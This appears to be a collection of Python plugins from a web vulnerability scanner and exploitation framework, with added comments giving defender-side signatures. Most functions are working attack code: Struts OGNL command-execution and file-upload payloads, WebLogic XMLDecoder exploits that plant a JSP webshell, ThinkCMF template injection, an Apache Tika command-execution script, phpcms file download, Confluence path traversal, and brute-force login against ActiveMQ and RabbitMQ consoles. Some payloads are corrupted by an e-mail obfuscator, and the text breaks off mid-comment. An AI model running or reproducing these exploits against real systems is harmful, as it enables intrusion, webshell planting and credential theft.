# Locates the renamed DedeCMS admin directory: tags.php is POSTed crafted
# `_FILES[mochazz][tmp_name]` paths ("./<guess><</images/adminico.gif") one
# prefix / one extra character at a time, and a reply that does NOT contain
# "Upload filetype not allow !" is taken to mean the guessed path exists.
# Read-only against the target, but itertools.permutations over 39 characters
# for lengths 1..6 can mean a very large number of POSTs (hence the docstring).
# Defender view: bursts of POSTs to tags.php whose body carries
# `_FILES[...][tmp_name]` with `<<` in the value are a clear log/WAF signature.
def prove(data): ''' Quite slow; better run as a standalone script ''' data = init(data, 'dedecms') if data['base_url']: characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" _data = { "_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif", "_FILES[mochazz][name]": 0, "_FILES[mochazz][size]": 0, "_FILES[mochazz][type]": "image/gif" } for a in ['', 'dedecms/']: url = data['base_url'] + a + 'tags.php' back_dir = "" flag = 0 res = curl('get', url) if res!=None and res.status_code ==200: for num in range(1, 7): if flag ==1 : break for pre in itertools.permutations(characters, num): pre = ''.join(list(pre)) _data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre) r = curl('post', url, data=_data) if r!=None: if "Upload filetype not allow !" not in r.text and r.status_code == 200: flag = 1 back_dir = pre _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" flag = 0 x = 0 for i in range(30): if flag == 1: x = i break for ch in characters: if ch == characters[-1]: flag = 1 x = i break _data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch) r = curl('post', url, data=_data) if r != None: if "Upload filetype not allow !" not in r.text and r.status_code == 200: back_dir += ch _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" if x < 29 and flag ==1: data['flag'] = 1 data['data'].append({"url": data['base_url'] + a + back_dir}) data['res'].append({"info": data['base_url'] + a + back_dir, "key": 'dede_manage'}) return data
# phpcms v9 "download" chain: the wap init page yields a `_siteid` cookie, the
# swfupload_json action (with a percent-encoded `src=` that ends in an encoded
# ".php") yields an `_att_json` cookie, the content/down action turns that
# into a link, and the probe reports when the fetched link body contains `<?php`.
# Read-only against the target.  re.findall(...)[0] and the cookie loops are
# unguarded, so a page that deviates from the expected layout raises instead
# of returning data.
# Defender view: the request sequence wap/init -> attachments/swfupload_json ->
# content/down from one client, with a `src=` value ending in an encoded
# ".php", is the signature.
def prove(data): data = init(data, 'phpcms') if data['base_url']: headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4"} for path in ["", "phpcms/"]: url1 = data['base_url'] + path +"index.php?m=wap&c=index&a=init&siteid=1" res1 = curl('get',url1,headers = headers) if res1 !=None: for cookie in res1.cookies: if '_siteid' in cookie.name: userid = cookie.value url2 = data['base_url'] + path +"index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3Dindex%26f%3D.p%25253chp" _data1 = {'userid_flash': userid} res2 = curl('post', url=url2, data=_data1,headers = headers) if res2 != None: for cookie in res2.cookies: if '_att_json' in cookie.name: att_json = cookie.value url3 = data['base_url'] + path +"index.php?m=content&c=down&a=init&a_k=" + att_json res3 = curl('get', url3,headers = headers) if res3 !=None: file = re.findall(r'<a href="(.+?)"', res3.text)[0] url4 = data['base_url'] + path + 'index.php' + file res4 = curl('get', url4,headers = headers) if res4 !=None: if '<?php' in res4.text: data['flag'] = 1 data['data'].append({"url": url4}) data['res'].append({"info": url1, "key": "phpcms v9 download",'connect':res4.text}) return data return data
# WebLogic wls-wsat probe: a SOAP envelope whose WorkContext header carries a
# java.beans.XMLDecoder document is POSTed to wls-wsat/CoordinatorPortType; the
# decoder is driven to write `<six random digits>.txt` containing
# "xmldecoder_vul_test" into the bea_wls_internal web-app (first attempt) or
# the wls-wsat web-app (fallback), and the probe then GETs that marker.
# Side effect on target: the marker file is written and never removed.
# The `except Exception as e: pass` hides every transport error.
# Defender view: a POST to wls-wsat/* with `java.beans.XMLDecoder` in the body
# followed by a GET for /bea_wls_internal/<digits>.txt or /wls-wsat/<digits>.txt
# is the signature; patch WebLogic and restrict or remove the wls-wsat
# component where it is not needed.
def prove(data): data = init(data, 'weblogic') if data['base_url']: headers = {"Content-Type": "text/xml"} url = data['base_url'] + 'wls-wsat/CoordinatorPortType' ran = str(random.randint(100000, 999999)) poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>' try: result = curl('post', url, data=poc, headers=headers) targeturl = data['base_url'] + "/bea_wls_internal/" + ran + ".txt" result = curl('get', targeturl) if result and str( result.status_code ) == '200' and 'xmldecoder_vul_test' in result.text: data['flag'] = 1 data['data'].append({"page": '/wls-wsat/CoordinatorPortType'}) data['res'].append({"info": url, "key": targeturl}) else: ran = str(random.randint(100000, 999999)) poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>' result = curl('post', url, data=poc, headers=headers) targeturl = data['base_url'] + "/wls-wsat/" + ran + ".txt" result = curl('get', url) if result and str( result.status_code ) == '200' and 'xmldecoder_vul_test' in result.text: data['flag'] = 1 data['data'].append( {"page": 
'/wls-wsat/CoordinatorPortType'}) data['res'].append({"info": targeturl, "key": url}) except Exception as e: pass return data
# Deploys a JSP named ahtest.jsp through the same wls-wsat/CoordinatorPortType
# endpoint (the two envelopes are the module-level shellpoc1 / shellpoc2, not
# shown here) and confirms it by fetching the page and looking for "ahtest".
# Side effect on target: a command-execution page (`?pwd=ahtest&cmd=`) is left
# under /bea_wls_internal/ or /wls-wsat/ and is never cleaned up — an
# incident-response artifact.  `result.status_code` is read without checking
# that curl returned a response, so a transport failure raises here.
# Defender view: any ahtest.jsp under those paths, or requests carrying
# `pwd=ahtest`, show that this tool was run against the host.
def upload(data=None): data = init(data, 'weblogic') if data['base_url']: headers = {"Content-Type": "text/xml"} url = data['base_url'] + 'wls-wsat/CoordinatorPortType' result = curl('post', url, data=shellpoc1, headers=headers) targeturl = data['base_url'] + "/bea_wls_internal/ahtest.jsp" result = curl('get', targeturl) if str(result.status_code) == '200' and 'ahtest' in result.text: data['flag'] = 1 data['data'].append({"page": '/wls-wsat/CoordinatorPortType'}) data['res'].append({ "info": url, "key": targeturl + "?pwd=ahtest&cmd=whoami" }) else: result = curl('post', url, data=shellpoc2, headers=headers) targeturl = data['base_url'] + "/wls-wsat/ahtest.jsp" result = curl('get', targeturl) if str(result.status_code) == '200' and 'ahtest' in result.text: data['flag'] = 1 data['data'].append({"page": '/wls-wsat/CoordinatorPortType'}) data['res'].append({ "info": targeturl + "?pwd=ahtest&cmd=whoami", "key": "/wls-wsat/CoordinatorPortType" }) return data
# ThinkCMF template-injection probe: a template body POSTed to
# index.php?g=Comment&m=Widget&a=fetch that, if rendered, runs
# file_put_contents and drops bytestforme1.php (a phpinfo() page) in the web
# root; the probe then fetches that file and looks for "php.ini".
# Side effect on target: bytestforme1.php is written and never removed.
# `init(data,'thinkcmf')` is called for its side effect only; the sibling
# probes rebind `data = init(...)`.
# Defender view: POSTs to this action with `templateFile=/../` and `<php>` tags
# in the body, or a new bytestforme1.php in the web root, indicate the probe.
def prove(data): init(data,'thinkcmf') if data['base_url']: url = data[ 'base_url'] + "index.php?g=Comment&m=Widget&a=fetch" _data = "templateFile=/../public/index&prefix=''&content=<php>file_put_contents('bytestforme1.php','<?php phpinfo();')</php>" res = curl('post', url,data = _data) if res != None and res.status_code == 200: res = curl('get', data['base_url'] + "/bytestforme1.php") if res != None and res.status_code == 200 and 'php.ini' in res.text: data['flag'] = 1 data['data'].append({"flag": url}) data['res'].append({"info": url, "key": "thinkcmf 2.2.3 template inject"}) return data
# Struts file drop via the `redirect:` action prefix: the OGNL in the
# `redirect:${...}` parameter opens a FileWriter on data['despath'] and appends
# the `shell=` request parameter, which carries the contents of the local file
# data['srcpath'].  The request is sent with `data=` on a GET, and the outcome
# is never checked: data['flag'] is set to 1 as soon as curl returns.
# Side effect on target: the file at despath is created and left in place.
# Defender view: query strings or bodies containing `redirect%3a%24%7b`
# (redirect:${) together with `com.opensymphony.xwork2.dispatcher` are the
# signature; the `redirect:` prefix should be disabled on exposed actions.
def upload(data): data = init(data, 'struts') if data['url'] != None: despath = data['despath'] content = _read_file(data['srcpath']) prove_poc = "redirect%3a%24%7b%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27)%2c%23res%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2c%23res.getWriter().print(%22oko%22)%2c%23res.getWriter().print(%22kok%2f%22)%2c%23res.getWriter().print(%23req.getContextPath())%2c%23res.getWriter().flush()%2c%23res.getWriter().close()%2cnew+java.io.BufferedWriter(new+java.io.FileWriter(%22%PATH%%22)).append(%23req.getParameter(%22shell%22)).close()%7d&shell=%FILECONTENT%".replace("%PATH%", despath).replace("%FILECONTENT%", content) try: headers = {"Content-Type": "application/x-www-form-urlencoded"} curl('get', data['url'], data=prove_poc, headers=headers) data['flag'] = 1 data['data'].append({"poc": prove_poc}) data['res'].append({"info": data['despath'],"key":"upload"}) except: pass return data
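def prove(data):
    """Fingerprint a WAF in front of data['url'] using the `_dna` signature list.

    `_dna` (module-level, not shown here) holds one signature per line as
    ``name|location|key|regex``.  ``location`` is ``headers`` (the regex must
    match the response headers and ``key`` must appear in them) or ``index``
    (the regex must match the page body).  On the first match data['flag'] is
    set to 1 and {"info": <name>, "key": "waf"} is appended to data['res'].
    Best-effort: any transport or parsing failure leaves data untouched.
    Returns data.
    """
    data = init(data, 'web')
    if not data['url']:
        return data
    try:
        res = curl('get', data['url'])
        headers = res.headers
        # re.search() needs text; a mapping (as `requests` returns) made the
        # original raise TypeError on the first "headers" signature, and the
        # bare except then hid it, so header-based WAFs were never detected.
        # NOTE(review): assumes res.headers is either a str or a mapping — confirm
        # against curl().
        if isinstance(headers, str):
            header_text = headers
        else:
            header_text = "\n".join("%s: %s" % (k, v) for k, v in headers.items())
        html = res.text
        waf = None
        for mark in _dna.strip().splitlines():
            name, location, key, reg = mark.strip().split("|", 3)
            if location == "headers":
                if re.search(reg, header_text, re.I) and key in headers:
                    waf = name
                    break
            elif location == "index":
                if re.search(reg, html, re.I):
                    waf = name
                    break
        title = re.search(r'<title>(.*)?<\/title>', html)
        if title:
            print(title.group(1), 'title')
        if waf is not None:
            data['flag'] = 1
            data['res'].append({"info": waf, "key": "waf"})
    except Exception:
        # Narrowed from a bare except so Ctrl-C still stops the scan; a failed
        # fetch or a malformed signature line simply yields no fingerprint.
        pass
    return data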
# Confluence widget-macro template probe: a macro preview whose `_template`
# is "../web.xml" is POSTed to rest/tinymce/1/macro/preview and the reply is
# reported when it contains `</web-app>` (the first limitSize=100 chars of the
# <web-app> element are recorded in data['data']).  Read-only against the
# target.  The bare `except: pass` hides transport errors and a None `r` alike.
# Defender view: POSTs to that REST path whose JSON `_template` contains `../`
# are the signature.
def prove(data): data = init(data, 'confluence') if data['base_url']: filename = "../web.xml" limitSize = 100 payload = data['base_url'] + "rest/tinymce/1/macro/preview" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Referer": data['base_url'] + "pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&", "Content-Type": "application/json; charset=utf-8" } _data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename try: r = curl('post', payload, data=_data, headers=headers) if r.status_code == 200 and "</web-app>" in r.text: m = re.search('<web-app[\s\S]+<\/web-app>', r.text) if m: content = m.group()[:limitSize] data['flag'] = 1 data['data'].append({"content": content}) data['res'].append({"info": payload, "key": filename}) except: pass return data
# Apache Tika server command execution on Windows: a PUT to /meta whose
# X-Tika-OCRTesseractPath names cscript and whose X-Tika-OCRLanguage is
# `//E:Jscript` makes the OCR step run the request body — a WScript.Shell
# .Exec('cmd /c <data['cmd']>') script — as JScript.  Success is inferred from
# "X-Parsed-By" and "tika.parse" in the reply, not from command output, and
# data['cmd'] is interpolated into the script unquoted.  The `init(data,
# 'apache')` return value is dropped (siblings rebind `data`).
# Defender view: a PUT /meta carrying X-Tika-OCRTesseractPath or
# X-Tika-OCRLanguage headers from an untrusted client is the signature; a
# tika-server should not be reachable from untrusted networks.
def exec(data): init(data, 'apache') if data['base_url']: headers = { "X-Tika-OCRTesseractPath": "\"cscript\"", "X-Tika-OCRLanguage": "//E:Jscript", "Expect": "100-continue", "Content-type": "image/jp2", "Connection": "close" } url = data['base_url'] + "meta" jscript = '''var oShell = WScript.CreateObject("WScript.Shell"); var oExec = oShell.Exec('cmd /c {}'); '''.format(data['cmd']) try: res = curl('put', url, headers=headers, data=jscript) if res != None and "X-Parsed-By" in res.text and "tika.parse" in res.text: data['flag'] = 1 data['data'].append({"flag": url}) data['res'].append({ "info": res.text, "key": "Apache Tika-server RCE" }) except: pass return data
# Struts command execution: data['cmd'] is substituted into an OGNL expression
# that is sent as the "test" multipart file part; the expression runs the
# command through ProcessBuilder and copies its output into the response.
# As printed here the `#dm=...DEFAULT_MEMBER_ACCESS` fragment has been
# rewritten by an e-mail-address obfuscator (`[email protected]`), so this
# copy is not intact.  `r` is `curl(...).text`, a str, yet `r.iter_lines()` is
# called on it; the AttributeError is swallowed by the inner bare except, so
# `res` is always "" and data['flag'] is set whatever the outcome.
# Defender view: multipart parts whose content starts with `%{(#` and names
# `ognlUtil` or `ProcessBuilder` are the signature.
def exec(data=None): data = init(data, 'struts') if data['url'] != None: cmd = data['cmd'] exec_poc = '''%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='%COMMAND%').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b''' headers = {} try: files = { "test": (exec_poc.replace("%COMMAND%", cmd), "text/plain") } r = curl('post', data['url'], headers=headers, files=files, stream=True).text res = "" try: for line in r.iter_lines(): res += str(line) + '\r\n' except: res = str(res) data['flag'] = 1 data['data'].append({"poc": exec_poc}) data['res'].append({"info": res, "key": cmd}) except: pass return data
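def _ICPbybeianbeian(domain, dic):
    """Look up the ICP record of *domain* on beianbeian.com.

    Up to three attempts are made.  On a page that parses, ``dic['flag']`` and
    ``dic['beianbeian_icp']`` are set to True and ``(dic, found)`` is returned,
    where *found* is True only when a new ``domain:link_text:pass_time`` entry
    was appended to ``dic['ICP']``.  After three failed fetches the error is
    logged and ``(dic, False)`` is returned.  *dic* is mutated in place.
    """
    url = "http://www.beianbeian.com/search/" + domain.strip(' ')
    for _ in range(3):
        try:
            result = curl('get', url)
            soup = BeautifulSoup(result.text, "html5lib")
            anchors = soup.find_all('a', href=re.compile('/beianxinxi/'))
            pass_time = soup.find(id="pass_time")
            icp_info = domain
            # Both pieces are needed for a usable entry.  A page with a record
            # link but no pass_time element used to raise AttributeError and
            # burn a retry; it is now simply "nothing found".
            if anchors and pass_time is not None:
                icp_info += ":" + anchors[0].get_text() + ":" + pass_time.get_text()
            found = False
            if icp_info != domain and icp_info not in dic['ICP']:
                dic['ICP'].append(icp_info)
                found = True
            dic['flag'] = True
            dic['beianbeian_icp'] = True
            return dic, found
        except Exception:
            # Narrowed from a bare except so Ctrl-C still interrupts the scan.
            pass
    logger.debug("Error for ICP(%s)%s by beianbeian" % (dic['id'], domain))
    return dic, False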
# Struts dev-mode file drop: `debug=command&expression=...` (the debugging
# interceptor) evaluates an OGNL expression that writes the `shell=` parameter
# — the contents of the local data['srcpath'] — to data['despath'].  Sent as
# the params of a GET; success is never verified (data['flag'] is set to 1
# once curl returns).
# Side effect on target: the file at despath is created and left in place.
# Defender view: a `debug=command` query with `expression=` is the signature;
# struts.devMode must be off in production.
def upload(data=None): data = init(data, 'struts') if data['url'] != None: upload_poc = '''debug=command&expression=#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.getWriter().print("oko"),#res.getWriter().print("kok/"),#res.getWriter().print(#req.getContextPath()),#res.getWriter().flush(),#res.getWriter().close(),new java.io.BufferedWriter(new java.io.FileWriter(%PATH%)).append(#req.getParameter("shell")).close()&shell=%FILECONTENT%''' despath = data['despath'] content = _read_file(data['srcpath']) headers = {} try: headers["Content-Type"] = "application/x-www-form-urlencoded" curl('get', data['url'],params=upload_poc.replace("%PATH%", despath).replace("%FILECONTENT%", content),headers=headers) data['flag'] = 1 data['data'].append({"poc": upload_poc}) data['res'].append({"info": data['despath'],"key":"upload"}) except: pass return data
# Credential guessing against the ActiveMQ web console (<base_url>admin/) with
# HTTP Basic: every username × password pair from data['d1'] / data['d2']
# (defaults under dict/) is tried and a reply containing "Console" is
# reported.  The loop never stops on a hit, so every pair is always sent;
# `b64encode` receives a str (the rabbitmq sibling encodes to bytes first);
# and the Authorization header is written into the shared data['headers']
# and never removed, so it leaks into later requests made with that dict.
# Defender view: a run of 401s from one client against admin/ with differing
# Authorization values; rate-limit and change the default console credentials.
def prove(data): data = init(data, 'activemq') if data['base_url']: usernamedic = _read_dic(data['d1']) if 'd1' in data.keys( ) else _read_dic('dict/activemq_usernames.txt') passworddic = _read_dic(data['d2']) if 'd2' in data.keys( ) else _read_dic('dict/activemq_passwords.txt') url = data['base_url'] + "admin/" for linef1 in usernamedic: username = linef1.strip('\r').strip('\n') for linef2 in passworddic: try: password = (linef2 if '%user%' not in linef2 else str(linef2).replace( "%user%", str(username))).strip('\r').strip('\n') key = b64encode(":".join([username, password])) data['headers']["Authorization"] = 'Basic %s' % key res = curl('get', url) if 'Console' in res.text: data['flag'] = 1 data['data'].append({ "username": username, "password": password }) data['res'].append({ "info": username + "/" + password, "key": "Authorization: " + key }) except Exception: pass return data
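def _ICPsobeian(domain, dic):
    """Look up the ICP record of *domain* on sobeian.com.

    Up to three attempts are made.  When the result page parses, ``dic['flag']``
    and ``dic['sobeian_icp']`` are set to True and ``(dic, found)`` is
    returned; *found* is True only when a new ``domain:link_text:date`` entry
    was appended to ``dic['ICP']``.  After three failed fetches the error is
    logged and ``(dic, False)`` is returned.  *dic* is mutated in place.
    """
    url = "http://www.sobeian.com/search?key=" + domain.strip(' ') + "/"
    for _ in range(3):
        try:
            result = curl('get', url)
            soup = BeautifulSoup(result.text, "html5lib")
            found = False
            for row in soup.find_all("span", class_="list-group-item clearfix"):
                links = row.find_all('a', href=re.compile('/icp/details/'))
                # The third link's text is matched against *domain* and the
                # second link's text is recorded.  Rows with fewer links used
                # to raise IndexError and burn a whole retry; skip them.
                if len(links) < 3 or domain not in links[2].get_text().split(' '):
                    continue
                icp_time = "None"
                date_match = re.search(r'\d{4}\-\d{2}\-\d{2}', row.get_text())
                if date_match is not None:
                    icp_time = date_match.group()
                icp_info = domain + ":" + links[1].get_text() + ":" + icp_time
                # The sibling lookups de-duplicate before appending; do the same.
                if icp_info not in dic['ICP']:
                    dic['ICP'].append(icp_info)
                    found = True
                break
            dic['flag'] = True
            dic['sobeian_icp'] = True
            return dic, found
        except Exception:
            # Narrowed from a bare except so Ctrl-C still interrupts the scan.
            pass
    logger.debug("Error for ICP(%s)%s by sobeian" % (dic['id'], domain))
    return dic, False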
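def _ICPbyaizhan(domain, dic):
    """Look up the ICP record of *domain* on icp.aizhan.com.

    Up to three attempts are made.  When the page parses, ``dic['flag']`` and
    ``dic['aizhan_icp']`` are set to True and ``(dic, found)`` is returned;
    *found* is True only when a new entry — *domain* followed by the text of
    every ``<span>`` in the ``icp-table`` element, colon-separated — was
    appended to ``dic['ICP']``.  After three failed fetches the error is
    logged and ``(dic, False)`` is returned.  *dic* is mutated in place.
    """
    url = "https://icp.aizhan.com/" + domain.strip(' ') + "/"
    for _ in range(3):
        try:
            result = curl('get', url)
            soup = BeautifulSoup(result.text, "html5lib")
            table = soup.find(id="icp-table")
            icp_info = domain
            if table is not None:
                for cell in table.find_all('span'):
                    text = cell.get_text()
                    if text is not None:
                        icp_info += ":" + text
            found = False
            if icp_info != domain and icp_info not in dic['ICP']:
                dic['ICP'].append(icp_info)
                found = True
            dic['flag'] = True
            dic['aizhan_icp'] = True
            return dic, found
        except Exception:
            # Narrowed from a bare except so Ctrl-C still interrupts the scan.
            pass
    logger.debug("Error for ICP(%s)%s by aizhan" % (dic['id'], domain))
    return dic, False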
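def prove(data):
    """Resolve data['target_host'] and append an "IP Information" entry.

    The resolved address is looked up at ip.taobao.com; region, ISP and city
    are appended to the info string when the service returns them.  An
    unresolvable host returns data unchanged; any failure of the lookup
    service still records the bare address.  Sets data['flag'] = 1 whenever
    the host resolved.  Returns data.
    """
    try:
        address = socket.gethostbyname(data['target_host'])
    except Exception:
        # Name does not resolve: nothing to report.
        return data
    info = address
    data['flag'] = 1
    # NOTE: the resolved address of the scan target is disclosed to a
    # third-party geolocation service by this request.
    url = "http://ip.taobao.com/service/getIpInfo.php?ip=%s" % address
    # The original looped forever on 502s and on swallowed exceptions (a dead
    # service or a curl() returning None hung the scan); bound the attempts.
    max_attempts = 10
    for _ in range(max_attempts):
        try:
            res = curl('get', url)
            if res.status_code == 502:
                # Gateway hiccup: back off briefly and retry.
                time.sleep(0.3)
                continue
            if res.status_code == 200:
                payload = json.loads(res.text)
                # code == 1 is the service's "no data" answer.
                if payload['code'] != 1:
                    geo = payload['data']
                    if geo['region']:
                        info += " | Region: " + geo['region']
                    if geo['isp']:
                        info += " | ISP: " + geo['isp']
                    if geo['city']:
                        info += " | City: " + geo['city']
            break
        except Exception:
            continue
    data['res'].append({"info": info, "key": 'IP Information'})
    return data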
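def _by114best(target, dic):
    """Collect the domains that 114best.com lists for *target* into dic['domain'].

    Up to three attempts are made.  Every ``<span>`` inside the ``rl`` element
    of the result page, with whitespace removed, is appended to
    ``dic['domain']`` unless already present; ``dic['114best_domain']`` and
    ``dic['flag']`` are then set to True.  After three failed fetches the
    error is logged.  *dic* is mutated in place and returned either way.

    The original built a randomised X-Forwarded-For header that it never
    passed to curl(); that dead code is gone.
    """
    url = "http://www.114best.com/ip/114.aspx?w=" + target.strip(' ')
    for _ in range(3):
        try:
            result = curl('get', url)
            soup = BeautifulSoup(result.text, "html5lib")
            # A page without the "rl" element raises here and is retried, as before.
            for span in soup.find(id="rl").find_all('span'):
                name = span.get_text().replace(" ", "").replace("\r", "").replace("\n", "")
                if name not in dic['domain']:
                    dic['domain'].append(name)
            dic['114best_domain'] = True
            dic['flag'] = True
            return dic
        except Exception:
            # Narrowed from a bare except so Ctrl-C still interrupts the scan.
            pass
    logger.debug("Error for (%s)%s by 114best" % (dic['id'], target))
    return dic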
# HTTP PUT probe: if the OPTIONS reply for <base_url>/testbyme lists PUT,
# three `<unix time>.jsp` variants (trailing "/", "::$DATA", "%20") are PUT to
# the root and a 201/204 reply is reported.  Side effect on target: any file
# the server accepted stays there.  `res.status` is read where the rest of
# this file uses `status_code`, and the bare `except: pass` hides the
# resulting error, so this probe currently reports nothing either way.
# Defender view: PUT requests for *.jsp with these suffixes are the signature;
# PUT should not be enabled on content paths.
def prove(data): data = init(data, 'web') if data['base_url'] != None: try: res = curl('options',data['base_url']+"/testbyme") allow = res.headers['Allow'] if 'PUT' in allow: for _url in [str(int(time.time())) + '.jsp/',str(int(time.time())) + '.jsp::$DATA',str(int(time.time())) + '.jsp%20']: url = data['base_url'] + _url res = curl('put', url) if res.status == 201 or res.status == 204: data['flag'] = 1 data['data'].append({"method": "put"}) data['res'].append({"info": url,"key":"PUT"}) except: pass return data
# Struts file drop via a malicious Content-Type header: the OGNL in the header
# opens a FileOutputStream on data['despath'] and copies the request input
# stream into it.  As printed, the `#dm=...`, `#req=...` and `#res=...`
# fragments have been rewritten by an e-mail-address obfuscator
# (`[email protected]`), so this copy is not intact.  data['flag'] is set to 1
# once curl returns, so success is never verified, and data['data'] records
# the full header — i.e. the payload itself.
# Side effect on target: the file at despath is created and left in place.
# Defender view: a Content-Type header beginning with `%{` is the signature.
def upload(data): data = init(data, 'struts') if data['url'] != None: despath = data['despath'] content = _read_file(data['srcpath']) headers = {} headers[ "Content-Type"] = """%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#fs=new java.io.FileOutputStream("%PATH%")).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}""".replace( "%PATH%", despath).replace("%FILECONTENT%", content) try: curl('get', data['url'], headers=headers) data['flag'] = 1 data['data'].append({"headers": headers}) data['res'].append({"info": data['despath'], "key": 'upload'}) except: pass return data
def _gethtml(url):
    """Fetch *url* and return {"html": body, "code": status, "url": url}.

    Any exception raised while fetching or reading the response (including a
    curl() that returned None) yields {"html": "", "code": 0, "url": url}.
    """
    try:
        resp = curl('get', url)
        page = {"html": resp.text, "code": resp.status_code, "url": url}
    except Exception:
        page = {"html": "", "code": 0, "url": url}
    return page
# Credential guessing against the RabbitMQ management API (<base_url>api/whoami)
# with HTTP Basic: every username × password pair from data['d1'] / data['d2']
# (defaults under dict/) is tried and a reply containing "Console" is
# reported; unlike the activemq sibling this returns on the first hit.  The
# guards `res == 401` and `res != 401` compare the response object with an
# int rather than reading its status code.
# Defender view: a run of 401s from one client against api/whoami with
# differing Authorization values; rate-limit and change default credentials.
def prove(data): data = init(data, 'rabbitmq') if data['base_url']: usernamedic = _read_dic(data['d1']) if 'd1' in data.keys( ) else _read_dic('dict/rabbitmq_usernames.txt') passworddic = _read_dic(data['d2']) if 'd2' in data.keys( ) else _read_dic('dict/rabbitmq_passwords.txt') url = data['base_url'] + 'api/whoami' res = curl('get', url) if res == 401: for linef1 in usernamedic: username = linef1.strip('\r').strip('\n') for linef2 in passworddic: try: password = (linef2 if '%user%' not in linef2 else str(linef2).replace( "%user%", str(username))).strip('\r').strip('\n') key = str( b64encode( bytes(":".join([username, password]), 'utf-8')), 'utf-8') headers = {"Authorization": 'Basic %s' % key} res = curl('get', url, headers=headers) if res != 401 and 'Console' in res.text: data['flag'] = 1 data['data'].append({ "username": username, "password": password }) data['res'].append({ "info": username + "/" + password, "key": "Authorization: " + ":".join([username, password]) }) return data except Exception: pass return data
# UCMS upload probe: an XML body carrying base64 text is POSTed to
# uploadpic_html.jsp with toname=justfortest.jsp, then the decoded file is
# requested from cms-data/temp_dir/xxxx/temp.files/ and reported if its body
# contains "test by me".  Tried for both data['base_url'] and data['url'].
# Side effect on target: justfortest.jsp is written and never removed.
# `res.status_code is 200` is an identity comparison, not equality (CPython
# warns about it); the sibling probes use `==`.
# Defender view: POSTs to uploadpic_html.jsp with a `toname=` ending in `.jsp`
# are the signature.
def prove(data): xmldata = ''' <?xml version="1.0" encoding="UTF-8"?> <root> dGVzdCBieSBtZQ== </root> ''' data = init(data,'ucms') if data['base_url']: for url in [data['base_url'], data['url']]: myurl = url + '/ucms/cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx' res = curl('post',myurl,data = xmldata) if res != None and res.status_code is 200: myurl = url + '/ucms/cms-data/temp_dir/xxxx/temp.files/justfortest.jsp' testres = curl('post',myurl,data = xmldata) if testres != None and 'test by me' in testres.text: data['flag'] = 1 data['data'].append({"page": myurl}) data['res'].append({"info": myurl, "key": "ucms upload"}) return data
# Struts showcase file drop: the OGNL expression is sent as the `name=` field
# of saveGangster.action and opens a FileOutputStream on data['despath'].
# As printed, the `#dm=...`, `#req=...` and `#res=...` fragments have been
